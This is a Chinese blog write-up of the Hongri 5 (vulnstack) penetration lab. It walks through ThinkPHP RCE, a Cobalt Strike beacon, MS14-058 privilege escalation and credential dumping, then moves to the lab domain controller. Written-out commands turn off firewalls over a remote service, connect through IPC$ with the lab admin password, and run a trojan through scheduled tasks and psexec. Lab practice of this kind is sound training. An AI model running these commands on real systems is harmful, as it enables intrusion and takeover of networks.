红日5渗透

最新推荐文章于 2025-05-14 21:06:04 发布
最新推荐文章于 2025-05-14 21:06:04 发布
阅读量833 收藏 13
点赞数 12
文章标签: 网络安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_64777251/article/details/137522359
版权

红日5渗透

靶场搭建

靶场下载:漏洞详情 (qiyuanxuetang.net)

这次只有两台机器

win7

sun\heart 123.com

sun\Administrator dc123.com

2008

sun\admin 2020.com

Win7双网卡模拟内外网

和之前一样设置一个外网nat模式,一个仅主机模式

进去后会提示密码过期

改为1qaz@wsx

image-20240329124811000

2008 ip:192.168.26.138

image-20240329124838933

win7 ip: 外网192.168.131.150

​ 内网192.168.26.136

到c盘打开phpstudy

image-20240329125011733

image-20240329125054502

渗透

信息收集

端口探测

 nmap -p- -sC -sV 192.168.131.150

image-20240329125559901

可以看到80端口 和3306mysql端口开放

image-20240329125633924

映入眼帘的是thinkphp

直接上工具

漏洞利用

image-20240329125733960

image-20240329125941711

image-20240329130306630

找到了rce的漏洞

一键getshell

image-20240329130819770

然后用webshell管理工具连接

image-20240329131107456

上线CS

image-20240329131310270

cs生成的木马

通过蚁剑上传

image-20240329131344389

image-20240329131404666

运行hongri.exe

上线

image-20240329131421523

image-20240329131508650

提权

image-20240329131553535

通过windows ms14-058漏洞提权到system

image-20240329131718511

查看网络信息

image-20240329131800929

image-20240329131811170

探测到是双网卡

应该是内网

抓取密码

image-20240329132039908

image-20240329132056648

内网信息收集

通过ping来找域控的ip

ping sun.com

image-20240329132221199

得到2008dc ip;192.168.26.138

因为dc是内网环境不出网,我们无法直接连接到cs

但可以用win7作为代理 通过win7去连接dc

这时候要关闭win7防火墙

我们已经system权限所以直接可以关

netsh advfirewall set allprofiles state off

image-20240329132544583

image-20240329132911073

在provideing中找到listener

已经获得了域管理员的用户名密码,那么我们直接尝试使用psexec登录域控

不行

一直失败

估计2008机子上有防火墙

可以尝试关闭他的防火墙

在Windows 7上执行如下,让其与Windows 2008建立ipc$连接:

net use \\192.168.26.138\ipc$ "dc123.com" /user:"administrator"

image-20240329141811645

然后创建服务来远程关闭Windows 2008的防火墙:

sc \\192.168.26.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"    # 创建服务
sc \\192.168.26.138 start unablefirewall    # 立即启动服务

image-20240329142012074

image-20240329142022248

创建服务成功

image-20240329142051508

启动服务失败。。

但是我去本机看了一下是已经成功关闭防火墙了

估计是我执行两次会报错

再起一个中转监听 前面那个忽略掉

image-20240329142906202

image-20240329143040096

image-20240329143901251

上传木马到c:/

使用IPCKaTeX parse error: Undefined control sequence: \ipc at position 37: …192.168.138.138\̲i̲p̲c̲ “!qazwin7” /user:administrator

shell net use \\192.168.26.138\ipc$ "dc123.com" /user:administrator

image-20240329144052775

shell copy c:\内网.exe \192.168.26.138\c$

image-20240329144244304

中文名找不到 又改成123.exe

查看时间,通过计划任务执行木马
shell net time \\192.168.26.138

image-20240329144442744

shell at \\192.168.26.138 14:46:00 c:\123.exe

image-20240329144539106

image-20240329144553973

但一直没反应

很奇怪

换个方式试试

上传psexec

image-20240329164115424

shell c:\psexec64.exe -accepteula \\192.168.26.138 -u sun\administrator -p dc123.com -d -c c:\123.exe

image-20240329164932830

横向移动

想复杂了

后面我 port scan

image-20240329165823962

直接扫除了dc机445端口开着

这就和我之前打的红日2类似

可以直接利用smb横向了 因为已经都有域控密码了

image-20240329165912853

image-20240329165923665

成功上线域控 并且是system权限

image-20240329165934280

后面我 port scan

[外链图片转存中…(img-PFYFeTb6-1712578519583)]

直接扫除了dc机445端口开着

这就和我之前打的红日2类似

可以直接利用smb横向了 因为已经都有域控密码了

[外链图片转存中…(img-UlMiAy5N-1712578519583)]

[外链图片转存中…(img-pblTc7nB-1712578519583)]

成功上线域控 并且是system权限

[外链图片转存中…(img-tmh1FXLM-1712578519583)]

image-20240329170008095

m0_64777251
关注
渗透测试-红日靶场五
konglong12311的博客
05-27 1781
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
渗透测试-红日靶场一
konglong12311的博客
05-22 1998
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
小白渗透之旅——红日靶场5
qq_52849046的博客
05-28 1860
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅供学习,切勿用于实战,容易被gangan
红日靶场】vulnstack5-完整渗透过程_vulnhack
2401_84972893的博客
05-13 993
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
红日靶场二渗透测试
xinghen049的博客
05-28 1188
新手小白,如有不对望见谅,欢迎大神指出,文章仅限于学习交流,请勿用作非法用途
[内网渗透] 红日靶场1
pwfortune的博客
03-11 837
然后再直接查询一下, 写入shell (这个查询的操作会被记录到日志里面去, 从而将我们的shell给写入到日志文件里面去, 而日志文件之前也已经被设置为了。可以看到各种的参数, 比如服务器的绝对路径, 甚至最下面还有一个mysql的检测连接, 尝试一些弱口令, 发现root/root可以连接到数据库。进入到数据库了, 还是root的身份, 应该权限很高, 尝试拿shell, 写入文件。跟打域成员主机一样, 用上面的操作可以添加用户, 添加到管理员组, 从而拿下域控主机。
红日内网渗透靶场1
weixin_47781572的博客
10-10 2352
官方下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
红日内网渗透靶场vulnstack2
snowlyzz的博客
09-20 1289
红日渗透二学习
ATT&CK 红日5靶机渗透攻略
weixin_47311099的博客
01-27 2148
环境搭建 下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 本次只有两台靶机 ,Win7双网卡模拟内外网 虚拟机密码 win7 sun\heart 123.com sun\Administrator dc123.com 改为 !qazwin7 ​ nat:192.168.8.129 (改为dhcp获取) 仅主机:192.168.138.136 到c盘phpstudy中启动phpstudy ​ ​ 2008 sun\admin 2020.com
红日靶场渗透测试——红日靶场1(详细笔记
热门推荐
qq_52849046的博客
05-24 1万+
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅学习使用,切勿用于实战,容易被gangan
渗透测试-红日靶场二
konglong12311的博客
05-23 2001
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8695
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Compose笔记(二十二)--NavController
ljt2724960661的博客
05-11 952
这一节主要了解一下Compose中的NavController,它是实现导航功能的核心组件,提供了强大而灵活的页面管理能力...
Webug4.0靶场通关笔记-靶场搭建方法(3种方法)
mooyuan的网络安全博客
05-10 1059
Webug4.0 是国内安全团队开发的一款专注于Web应用安全的渗透测试实战平台(靶场),适合网络安全学习者从入门到进阶的实战训练,本文讲解3种搭建webug4.0靶场的方法。
单反和无反(私人笔记
Ye__o的博客
05-13 414
介绍单反和无反基本概念
[入门笔记] FatFs + TF卡 + 模拟SPI
Lovely_him的博客
05-13 909
FatFs + TF卡 + 模拟SPI 入门笔记
《设计模式之禅》笔记
千里之行,始于足下
05-11 425
《设计模式之禅》由秦小波撰写,深入解析了6大设计原则和28种设计模式的定义、应用及最佳实践。根据遗忘曲线,若无记录和回顾,6天后会遗忘75%的内容。因此,读书笔记作为记录和回顾的工具,其核心在于记录、翻看和思考。通过思维导图等结构化方式,可以更有效地掌握书中的核心观点,帮助读者在软件设计领域提升实践能力。
Linux基础 -- SSH 流式烧录与压缩传输笔记
最新发布
sz66cm 学习随笔
05-14 239
在嵌入式开发和维护中,通过SSH流式传输大文件并直接烧录到设备磁盘是一种高效的方法,尤其适用于设备端存储空间有限的情况。本文介绍了流式传输的基本原理,包括压缩与解压、并行传输等技术,并提供了多种实现方法,如基本流式烧录、启用压缩传输(gzip)、多线程压缩传输(pigz)等。此外,还探讨了如何提高写入可靠性、故障排查以及优化建议,如启用多线程压缩、确保网络稳定等。这些方法能够显著提升传输效率和可靠性,适用于需要频繁传输大文件的场景。
java学习笔记
2301_77574331的博客
05-11 358
增强for循环(也称为for-each循环)是Java中一种简化版的循环语法,专门用于遍历数组或集合中的元素。它比传统for循环更简洁易读。
红日内网渗透靶场搭建
02-21
### 构建红队内网渗透测试靶场环境 #### 选择合适的虚拟化平台 为了构建一个安全可控的实验环境,建议使用 VMware Workstation 或 VirtualBox 这样的桌面级虚拟化软件来创建多个虚拟机实例。这些工具允许灵活配置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值